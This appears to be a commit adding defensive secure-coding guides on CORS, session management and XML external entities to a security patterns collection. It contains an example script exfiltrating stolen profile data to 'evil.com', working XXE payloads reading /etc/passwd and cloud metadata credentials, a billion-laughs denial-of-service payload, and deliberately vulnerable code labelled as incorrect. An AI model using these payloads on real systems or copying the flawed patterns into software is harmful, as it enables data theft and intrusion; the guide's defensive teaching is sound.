Add session management, CORS, XXE patterns

Complete the security patterns collection:

- session-management.md: fixation, hijacking, secure cookies, concurrent sessions
- cors.md: origin validation, reflected origin attacks, preflight caching
- xxe.md: external entities, DTD attacks, language-specific fixes

Now 19 patterns covering comprehensive web application security.

@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
| [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
| [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |

-### Identity
+### Identity & Session

| File | Topic | OWASP 2025 |
|------|-------|------------|
| [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
| [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
| [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
+| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |

### Attack Prevention

@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
|------|-------|------------|
| [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
| [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
+| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
| [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | - |
| [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | - |
| [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
| [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | - |
+| [cors.md](cors.md) | Origin validation, credential handling | A01 |

### Infrastructure

@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.

| # | Category | Pattern |
|---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
| A02 | Security Misconfiguration | secure-defaults.md |
| A03 | Software Supply Chain Failures | supply-chain.md |
| A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
| A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
| A08 | Software or Data Integrity Failures | deserialization.md |
| A09 | Security Logging and Alerting Failures | audit-logging.md |
| A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |

@@ -0,0 +1,183 @@
# CORS Misconfiguration

## Rule

Never reflect the `Origin` header blindly. Allowlist specific origins. Never combine credentials with a wildcard origin.

**Source:** [OWASP Cross-Site Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)

## CORS Basics

Browsers block scripts from reading cross-origin responses by default (the same-origin policy). CORS response headers selectively relax that:

| Header | Purpose |
|--------|---------|
| `Access-Control-Allow-Origin` | Which origin may read the response |
| `Access-Control-Allow-Credentials` | Whether cookies and HTTP auth may be sent |
| `Access-Control-Allow-Methods` | Allowed HTTP methods |
| `Access-Control-Allow-Headers` | Allowed request headers |

## Correct Pattern

```python
from flask import Flask, make_response, request

app = Flask(__name__)

ALLOWED_ORIGINS = {
    "https://app.example.com",
    "https://admin.example.com",
}

def add_cors_headers(response):
    origin = request.headers.get("Origin")

    # Validate against allowlist
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"

    # Set on every response so shared caches key on Origin. Important for caching!
    response.headers["Vary"] = "Origin"

    return response

# For public APIs without credentials
def add_public_cors(response):
    response.headers["Access-Control-Allow-Origin"] = "*"
    # Note: credentials CANNOT be used with wildcard
    response.headers["Access-Control-Allow-Methods"] = "GET"
    return response

# Handle preflight requests
@app.route("/api/<path:path>", methods=["OPTIONS"])
def preflight(path):
    response = make_response()
    return add_cors_headers(response)
```

## Incorrect Pattern

```python
# Wrong: reflect any origin (allows any site to access)
@app.after_request
def bad_cors(response):
    origin = request.headers.get("Origin")
    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
    response.headers["Access-Control-Allow-Credentials"] = "true"
    return response
# Attack: evil.com can now make authenticated requests and read the responses

# Wrong: wildcard with credentials
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers["Access-Control-Allow-Credentials"] = "true"
# Browsers reject this combination, but it shows a misunderstanding of CORS

# Wrong: suffix match without a dot boundary
def check_origin(origin):
    return origin.endswith("example.com")
# Bypassed by: https://attacker-example.com

# Wrong: null origin allowed
ALLOWED_ORIGINS = {"https://app.example.com", "null"}
# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!

# Wrong: substring match
def check_origin(origin):
    return "example.com" in origin
# Bypassed by: https://example.com.evil.com
```
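
The suffix and substring bypasses above can be checked directly. The following is a minimal sketch; the function names and the attacker origins are illustrative assumptions, not part of any library.

```python
# Illustrative only: compares loose origin checks against an exact allowlist.

ALLOWED = frozenset({"https://app.example.com"})

# Origins an attacker could register and serve a page from (hypothetical).
ATTACKER_ORIGINS = [
    "https://attacker-example.com",
    "https://example.com.evil.com",
]


def suffix_check(origin: str) -> bool:
    """Flawed: no dot boundary, so any domain ending in the text passes."""
    return origin.endswith("example.com")


def substring_check(origin: str) -> bool:
    """Flawed: the trusted name may appear anywhere in the origin."""
    return "example.com" in origin


def exact_check(origin: str) -> bool:
    """Exact string comparison against the allowlist."""
    return origin in ALLOWED


def bypasses(check) -> list[str]:
    """Return the attacker origins that the given check wrongly accepts."""
    return [origin for origin in ATTACKER_ORIGINS if check(origin)]


if __name__ == "__main__":
    for check in (suffix_check, substring_check, exact_check):
        print(check.__name__, bypasses(check))
```

Only the exact comparison rejects both attacker origins while still accepting the legitimate one.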

## Origin Validation

```python
from urllib.parse import urlparse

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def is_valid_origin(origin: str) -> bool:
    """Strict origin validation."""
    if not origin:
        return False

    # Never allow null
    if origin == "null":
        return False

    # Exact match against allowlist
    if origin in ALLOWED_ORIGINS:
        return True

    # If you need subdomain matching, be careful:
    try:
        parsed = urlparse(origin)
        # Must be HTTPS
        if parsed.scheme != "https":
            return False

        # Exact domain match (not suffix!)
        allowed_domains = {"app.example.com", "admin.example.com"}
        if parsed.netloc in allowed_domains:
            return True

        # Subdomain of specific parent (careful!)
        if parsed.netloc.endswith(".trusted.example.com"):
            # Verify it's actually a subdomain, not suffix attack
            parts = parsed.netloc.split(".")
            if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
                return True
    except ValueError:
        # urlparse raises ValueError on malformed input; fail closed
        return False

    return False
```

## Attack Scenarios

```python
# Scenario 1: Data theft via reflected origin
#
# Vulnerable server reflects any Origin with credentials
#
# Attacker's evil.com:
# <script>
# fetch("https://api.victim.com/user/profile", {
#     credentials: "include"
# })
# .then(r => r.json())
# .then(data => {
#     // Send stolen data to attacker
#     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
# })
# </script>

# Scenario 2: CSRF via CORS
#
# If CORS allows credentials from evil.com,
# evil.com can make authenticated state-changing requests
```

## Preflight Caching

```python
@app.after_request
def cors_headers(response):
    origin = request.headers.get("Origin")
    if origin in ALLOWED_ORIGINS:
        response.headers["Access-Control-Allow-Origin"] = origin
        response.headers["Access-Control-Allow-Credentials"] = "true"
        # Cache preflight for up to 24h; browsers cap this value
        # (Chromium at 2 hours, Firefox at 24 hours)
        response.headers["Access-Control-Max-Age"] = "86400"
    response.headers["Vary"] = "Origin"  # CRITICAL for caching
    return response

# Why Vary: Origin matters:
# Without it, a CDN might cache the response for origin A
# and then serve that cached response to origin B (wrong ACAO header!)
```
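
Assigning `Vary` directly replaces any value set earlier in the response pipeline, for example `Accept-Encoding` from a compression layer. A minimal sketch of merging instead of overwriting follows; `merge_vary` is a hypothetical helper, not a Flask or Werkzeug function.

```python
from typing import Optional


def merge_vary(existing: Optional[str], field: str) -> str:
    """Return a Vary header value that contains `field` exactly once.

    `existing` is the current Vary value (or None if the header is absent).
    Field names are compared case-insensitively, as HTTP header names are.
    """
    if existing is None or not existing.strip():
        return field

    fields = [part.strip() for part in existing.split(",") if part.strip()]

    # "Vary: *" already means "never reuse from cache"; leave it alone.
    if "*" in fields:
        return "*"

    if field.lower() not in {part.lower() for part in fields}:
        fields.append(field)

    return ", ".join(fields)
```

In the handler above this could be used as `response.headers["Vary"] = merge_vary(response.headers.get("Vary"), "Origin")`.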

## Edge Cases

- WebSocket connections are not subject to CORS; validate the `Origin` header manually during the handshake
- `Access-Control-Expose-Headers` is needed before scripts can read custom response headers
- Preflight is not sent for "simple" requests (GET, HEAD, or POST with only CORS-safelisted headers and a form or `text/plain` content type)
- Internal APIs should still validate Origin (defense in depth)
- Browser extensions can bypass CORS (not a vulnerability)
- Server-to-server requests don't involve CORS
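
For the WebSocket case in the list above, the check has to be done by hand because the browser does not enforce CORS on the handshake. A minimal, framework-independent sketch follows; `websocket_origin_allowed` and `ALLOWED_WS_ORIGINS` are assumed names, and `headers` stands for whatever mapping of handshake request headers the WebSocket library exposes.

```python
from typing import Mapping

# Hypothetical allowlist for browser-based WebSocket clients.
ALLOWED_WS_ORIGINS = frozenset({"https://app.example.com"})


def websocket_origin_allowed(headers: Mapping[str, str]) -> bool:
    """Return True only if the handshake carries an allowlisted Origin.

    A missing Origin is rejected here. Non-browser clients often omit the
    header, so accepting them is a policy decision for the application.
    """
    # Header names are case-insensitive, so normalise before the lookup.
    normalised = {name.lower(): value for name, value in headers.items()}
    origin = normalised.get("origin")
    return origin is not None and origin in ALLOWED_WS_ORIGINS
```

The handshake should be refused (for example with HTTP 403) before the connection is upgraded when this returns `False`.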
@@ -0,0 +1,185 @@
# Session Management

## Rule

Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.

**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)

## Session Attacks

| Attack | Description | Defense |
|--------|-------------|---------|
| Session fixation | Attacker sets victim's session ID | Regenerate on login |
| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
| Session prediction | Guess valid session IDs | Cryptographic randomness |
| Session replay | Reuse captured session | Short expiration, binding |

## Correct Pattern

```python
import secrets
from datetime import datetime, timedelta, timezone
from flask import session, request

# verify_password(), invalidate_session_server_side() and User are
# app-specific and defined elsewhere.

# Generate cryptographically secure session ID
def generate_session_id() -> str:
    return secrets.token_urlsafe(32)  # 32 random bytes = 256 bits of entropy

# Session configuration
SESSION_CONFIG = {
    "cookie_name": "__Host-session",  # __Host- prefix requires Secure, Path=/ and no Domain
    "httponly": True,                 # Not accessible to JavaScript
    "secure": True,                   # HTTPS only
    "samesite": "Lax",                # CSRF protection
    "max_age": 3600,                  # Cookie lifetime: 1 hour
}

ABSOLUTE_TIMEOUT = timedelta(hours=8)  # Hard cap on session age, however active

# Regenerate session on privilege change
def login(user: "User", password: str) -> bool:
    if not verify_password(user, password):
        return False

    # CRITICAL: discard pre-login state to prevent fixation.
    # Flask's built-in cookie session has no regenerate() method; with a
    # server-side session store, also issue a fresh session ID here.
    session.clear()

    session["user_id"] = user.id
    session["login_time"] = datetime.now(timezone.utc).isoformat()
    session["ip"] = request.remote_addr
    session["user_agent"] = request.user_agent.string

    return True

def logout():
    # Invalidate server-side, not just client cookie
    session_id = session.get("_id")
    if session_id:
        invalidate_session_server_side(session_id)
    session.clear()

# Validate session binding
def validate_session() -> bool:
    if "user_id" not in session:
        return False

    # Check session age; a missing or malformed timestamp fails closed
    try:
        login_time = datetime.fromisoformat(session["login_time"])
    except (KeyError, ValueError):
        logout()
        return False
    if datetime.now(timezone.utc) - login_time > ABSOLUTE_TIMEOUT:
        logout()
        return False

    # Optional: bind to IP (careful with mobile/proxies)
    # if session.get("ip") != request.remote_addr:
    #     logout()
    #     return False

    return True
```

## Incorrect Pattern

```python
import random
import hashlib
from flask import redirect, session

# Wrong: predictable session ID
def bad_session_id():
    return str(random.randint(1000000, 9999999))

# Wrong: sequential session ID
COUNTER = 0
def bad_session_id_2():
    global COUNTER
    COUNTER += 1
    return str(COUNTER)

# Wrong: user-derived session ID
def bad_session_id_3(user_id):
    return hashlib.md5(str(user_id).encode()).hexdigest()

# Wrong: no regeneration on login (session fixation)
def bad_login(user, password):
    if verify_password(user, password):
        session["user_id"] = user.id  # Same session ID!
        return True
    return False

# Wrong: client-side only logout
def bad_logout():
    response = redirect("/")
    response.delete_cookie("session")
    return response
# Session still valid server-side!

# Wrong: missing cookie security flags
app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
```
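
The user-derived scheme above fails because anyone who knows or guesses a user ID can compute that user's session ID. A small sketch of the difference follows; the function names are illustrative assumptions.

```python
import hashlib
import secrets


def user_derived_id(user_id: int) -> str:
    """Flawed scheme: the session ID is a pure function of a guessable input."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def random_id() -> str:
    """32 bytes from the OS CSPRNG, encoded as URL-safe base64 text."""
    return secrets.token_urlsafe(32)


def attacker_forges(victim_user_id: int) -> str:
    """The attacker needs no secret: recomputing the hash is enough."""
    return hashlib.md5(str(victim_user_id).encode()).hexdigest()


if __name__ == "__main__":
    issued = user_derived_id(42)
    print("forged ID matches issued ID:", attacker_forges(42) == issued)
    print("random ID length:", len(random_id()))
```

With `random_id()`, two calls are overwhelmingly unlikely to ever agree, so there is nothing for the attacker to recompute.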

## Session Fixation Attack

```python
# Attack scenario:
# 1. Attacker visits site, gets session ID "abc123"
# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
# 3. Victim clicks, their browser now uses "abc123"
# 4. Victim logs in (session ID unchanged!)
# 5. Attacker uses "abc123" - now authenticated as victim

# Defense: ALWAYS regenerate on login
@app.route("/login", methods=["POST"])
def login():
    if not authenticate(request.form):
        return redirect("/login")  # Failed login: leave the session untouched

    # Drop the pre-login session. Flask's cookie session has no regenerate();
    # a server-side store must also issue a new session ID at this point.
    session.clear()
    session["authenticated"] = True
    return redirect("/")
```
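
What "regenerate" means for a server-side store can be sketched without any framework. The `SessionStore` class below is a hypothetical in-memory stand-in, not the API of Flask or of any session extension; a real store would live in a database or cache.

```python
import secrets
from typing import Optional


class SessionStore:
    """In-memory stand-in for a server-side session store (illustrative)."""

    def __init__(self) -> None:
        self._sessions: dict[str, dict] = {}

    def create(self) -> str:
        """Issue a new, empty session and return its ID."""
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {}
        return session_id

    def get(self, session_id: str) -> Optional[dict]:
        """Return the session data, or None if the ID is unknown or revoked."""
        return self._sessions.get(session_id)

    def regenerate(self, old_id: str) -> str:
        """Move the data to a fresh ID and invalidate the old one."""
        data = self._sessions.pop(old_id, {})
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = data
        return new_id


def login(store: SessionStore, presented_id: str, user_id: str) -> str:
    """Authenticate into a brand-new session ID, never the presented one."""
    new_id = store.regenerate(presented_id)
    store._sessions[new_id]["user_id"] = user_id
    return new_id
```

After `login`, the ID the attacker planted no longer resolves to any session, so step 5 of the attack fails.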

## Concurrent Session Control

```python
from datetime import datetime, timezone

# Session is an app-defined ORM model with create()/delete() helpers;
# generate_session_id() is the function from the Correct Pattern.

# Limit active sessions per user
MAX_SESSIONS_PER_USER = 3

def create_session(user_id: str) -> str:
    # Get existing sessions, oldest first
    existing = Session.query.filter_by(user_id=user_id).order_by(
        Session.created_at.asc()
    ).all()

    # Remove oldest sessions until there is room for the new one
    excess = len(existing) - MAX_SESSIONS_PER_USER + 1
    for oldest in existing[:max(excess, 0)]:
        oldest.delete()
        # Optionally notify user: "Logged out of oldest session"

    # Create new session
    session_id = generate_session_id()
    Session.create(
        id=session_id,
        user_id=user_id,
        created_at=datetime.now(timezone.utc),
        ip=request.remote_addr,
    )
    return session_id

# Allow user to view/revoke sessions
@app.route("/settings/sessions")
def list_sessions():
    sessions = Session.query.filter_by(user_id=current_user.id).all()
    return render_template("sessions.html", sessions=sessions)

@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
def revoke_session(session_id):
    # Named `target` so it does not shadow Flask's `session`
    target = Session.query.get(session_id)
    if target and target.user_id == current_user.id:
        target.delete()
    return redirect("/settings/sessions")
```

## Edge Cases

- Mobile apps: use short-lived access tokens, not sessions
- "Remember me": separate long-lived token, not extended session
- Password change should invalidate all other sessions
- Admin impersonation needs audit trail
- Idle timeout vs absolute timeout (both needed)
- Session data size limits (don't store large objects)
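
The idle and absolute timeouts from the list above answer different questions: "has the user gone away?" and "how long may one login last at most?". A minimal sketch of checking both follows; the 30-minute and 8-hour values and the function name are assumptions for illustration.

```python
from datetime import datetime, timedelta, timezone

IDLE_TIMEOUT = timedelta(minutes=30)   # assumed value: max gap between requests
ABSOLUTE_TIMEOUT = timedelta(hours=8)  # assumed value: max age since login


def session_expired(created_at: datetime, last_seen: datetime, now: datetime) -> bool:
    """Return True if either the absolute or the idle limit is exceeded."""
    if now - created_at > ABSOLUTE_TIMEOUT:
        return True  # too old, no matter how active the user has been
    return now - last_seen > IDLE_TIMEOUT


if __name__ == "__main__":
    login_at = datetime(2025, 1, 1, 9, 0, tzinfo=timezone.utc)
    now = login_at + timedelta(hours=9)
    # Active one minute ago, but logged in nine hours ago: still expired.
    print(session_expired(login_at, now - timedelta(minutes=1), now))
```

The caller would update `last_seen` on every authenticated request and never update `created_at`.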
@@ -0,0 +1,181 @@
# XML External Entities (XXE)

## Rule

Disable external entity processing. Disable DTDs. Use safe parser defaults.

**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)

## What XXE Can Do

- **File disclosure**: Read `/etc/passwd`, config files, source code
- **SSRF**: Make requests to internal services
- **DoS**: Billion laughs attack (exponential entity expansion)
- **Port scanning**: Error-based probing of internal ports
- **RCE**: In some configurations (PHP expect://)

## Attack Payloads

```xml
<!-- File disclosure -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

<!-- SSRF to cloud metadata -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

<!-- Billion laughs DoS -->
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- ... continues exponentially -->
]>
<lolz>&lol9;</lolz>
```

## Correct Pattern

```python
# Python - defusedxml (recommended)
import defusedxml.ElementTree as SafeET

def parse_xml_safe(xml_string: str):
    """Parse XML with XXE protection."""
    return SafeET.fromstring(xml_string)

# Python - standard library with default settings
# (separate alias so it does not shadow the defusedxml import above)
import xml.etree.ElementTree as ET

def parse_xml_manual(xml_string: str):
    """Standard-library parse; relies on ElementTree's defaults."""
    parser = ET.XMLParser()
    # Python's ElementTree doesn't resolve external entities by default,
    # but builds linked against Expat older than 2.4.1 remain exposed to
    # billion laughs. Always verify your specific library!
    return ET.fromstring(xml_string, parser=parser)

# lxml with safe settings
from lxml import etree

def parse_xml_lxml(xml_string: str):
    """lxml with XXE disabled."""
    parser = etree.XMLParser(
        resolve_entities=False,
        no_network=True,
        dtd_validation=False,
        load_dtd=False,
    )
    return etree.fromstring(xml_string.encode(), parser=parser)
```
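
Where `defusedxml` cannot be installed, the "disable DTDs" rule can be approximated with the standard library by rejecting any document that declares a DOCTYPE before building a tree. The following is a sketch under that assumption; `parse_without_dtd` and `DoctypeForbidden` are hypothetical names, and the approach is a simplified version of the idea, not a replacement for `defusedxml`.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it reaches "<!DOCTYPE ...", before any
    # entity declared inside the DTD has been processed.
    raise DoctypeForbidden(f"DOCTYPE declarations are not allowed: {name!r}")


def parse_without_dtd(xml_text: str) -> ET.Element:
    """Parse XML, refusing any document that carries a DTD."""
    # First pass: a bare expat parser whose only job is to fail on a DOCTYPE.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_text, True)

    # Second pass: no DTD present, so no entities can be declared.
    return ET.fromstring(xml_text)
```

All three payloads from the Attack Payloads section start with a DOCTYPE, so each would be rejected in the first pass.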

## Incorrect Pattern

```python
from lxml import etree

# Wrong: relying on lxml defaults (older releases resolve external entities)
def bad_parse(xml_string: str):
    return etree.fromstring(xml_string)

# Wrong: explicitly enabling dangerous features
def bad_parse_2(xml_string: str):
    parser = etree.XMLParser(resolve_entities=True)
    return etree.fromstring(xml_string, parser=parser)

# Wrong: using xml.dom.minidom without protection
from xml.dom.minidom import parseString

def bad_parse_3(xml_string: str):
    return parseString(xml_string)  # May be vulnerable

# Wrong: SAX parser without disabling features
# (external general entities were processed by default before Python 3.7.1)
import xml.sax

def bad_parse_4(xml_string: str):
    handler = xml.sax.ContentHandler()
    xml.sax.parseString(xml_string, handler)
```

## Language-Specific Fixes

### Java

```java
// DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

// SAXParserFactory
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```

### .NET

```csharp
// XmlReader (safe by default in .NET 4.5.2+)
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);

// XmlDocument
XmlDocument doc = new XmlDocument();
doc.XmlResolver = null;  // Disable external resources
doc.LoadXml(xmlString);
```

### PHP

```php
// PHP < 8.0: disable entity loading globally.
// Deprecated in PHP 8.0, where external entity loading is already off by default.
libxml_disable_entity_loader(true);

// Dangerous: these flags turn ON entity substitution and DTD loading.
// Never pass them when parsing untrusted XML:
// $doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);

// Safe: leave those flags out and forbid network access
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NONET);
```

## When You Need DTDs

```python
# If you absolutely need DTD validation (rare):
# 1. Allowlist specific DTDs
# 2. Fetch DTDs from local filesystem only
# 3. Never allow user-controlled DTD URLs
from lxml import etree

ALLOWED_DTDS = {
    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
}

class SafeResolver(etree.Resolver):
    def resolve(self, system_url, public_id, context):
        if public_id in ALLOWED_DTDS:
            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
        raise ValueError(f"DTD not allowed: {public_id}")

# Register the resolver on a parser that may load DTDs but not use the network
parser = etree.XMLParser(load_dtd=True, no_network=True, resolve_entities=False)
parser.resolvers.add(SafeResolver())
```

## Edge Cases

- SVG files are XML: validate uploads!
- SOAP/XML-RPC endpoints are XXE targets
- Office documents (DOCX, XLSX) contain XML
- Configuration files (Maven pom.xml, Spring beans.xml)
- RSS/Atom feeds
- SAML assertions
- Blind XXE (out-of-band data exfiltration via DNS/HTTP)
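
For the Office-document case in the list above, uploads can be screened before any XML parser touches them, since DOCX and XLSX files are ZIP archives of XML parts. The following is a rough sketch; `members_with_doctype` and the size cap are assumptions, and a plain byte search will miss parts encoded as UTF-16, so it complements a hardened parser rather than replacing one.

```python
import io
import zipfile

MAX_MEMBER_BYTES = 10 * 1024 * 1024  # assumed cap to avoid inflating huge parts


def members_with_doctype(archive_bytes: bytes) -> list[str]:
    """Return names of XML parts that declare a DOCTYPE or exceed the size cap."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                flagged.append(info.filename)  # too large to inspect safely
                continue
            if b"<!DOCTYPE" in archive.read(info):
                flagged.append(info.filename)
    return flagged
```

Legitimate Office files do not normally carry DTDs in their XML parts, so a non-empty result is a reasonable signal to reject the upload.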